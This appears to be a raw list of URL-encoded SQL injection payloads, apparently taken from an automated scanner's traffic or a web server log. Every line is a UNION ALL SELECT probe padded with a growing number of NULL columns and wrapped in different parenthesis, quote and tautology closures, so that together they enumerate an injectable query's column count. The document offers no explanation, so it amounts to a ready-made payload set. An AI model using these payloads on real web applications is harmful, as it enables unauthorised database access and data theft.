1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%201152%3D1152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%208018%3D8018%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%204541%3D4541%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%208272%3D8272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%201848%3D1848%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%205717%3D5717%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203340%3D3340%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%206664%3D6664%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%205841%3D5841%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201158%3D1158%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%208029%3D8029%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%206190%3D6190%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201700%3D1700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%204673%3D4673%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%206336%3D6336%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201152%3D1152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%202940%3D2940%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%202319%3D2319%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%203216%3D3216%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 